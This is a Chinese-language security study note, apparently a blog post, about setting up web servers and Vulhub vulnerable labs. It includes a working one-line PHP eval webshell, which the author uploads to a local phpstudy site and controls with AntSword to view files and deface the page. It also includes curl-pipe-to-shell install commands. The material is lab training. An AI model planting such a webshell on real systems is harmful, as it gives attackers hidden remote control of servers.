第2天 搭建安全拓展_小迪网络安全笔记

1.常见搭建平台脚本使用:

例如 phpstudy    IIS    Nginx(俗称中间件):

什么是中间件:

中间件是介于应用系统和系统软件之间的一类软件,它使用系统软件所提供的基础服务(功能),衔接网络上应用系统的各个部分或不同的应用,能够达到资源共享、功能共享的目的

1.1首先安装 phpstudy :之前写过---->8861.2安装配置完成之后 启动服务

1.3服务启动完成之后 将我们准备好的网页源代码 复制到 /phpstudy/www目录下

1.4上传php一句话木马看看:

<?php eval($_POST['2004']); ?>   //2004为shell密码

1.5上传完成之后  通过蚂蚁剑来里来连接看看:

连接成功:

此时就可以看到服务器磁盘内容以及网站源代码

1.6试图修改网站内容  啊哈哈哈哈:

看一下效果:

2.通过网站抓包来确定网站中间件:

发现是apache服务   win 32位系统    PHP版本为 5.4.45

3.使用Vulhub一键搭建漏洞测试靶场

3.1环境配置:

必要环境:

curl -s https://bootstrap.pypa.io/get-pip.py | python3
pip install docker-compose

docker安装:传送

# 安装pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3

# 安装最新版docker
curl -s https://get.docker.com/ | sh

# 启动docker服务
systemctl start docker

3.2 git靶场 并启动:

# 下载项目
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master

# 进入某一个漏洞/环境的目录
cd flask/ssti

# 自动化编译环境
docker compose build

# 启动整个环境
docker compose up -d

3.3进入一个漏洞目录  并进行编译

3.4启动服务:

3.5访问:http:"your-ip":8080   

ok 搭建成功!!!

3.6接着对应官方文档进行漏洞复现学习:

网站地址----->886

3.7测试完成后,删除整个环境:

docker compose down -v

免责声明:

本人所有文章均为技术分享,均用于学习为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

像linux的企鹅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值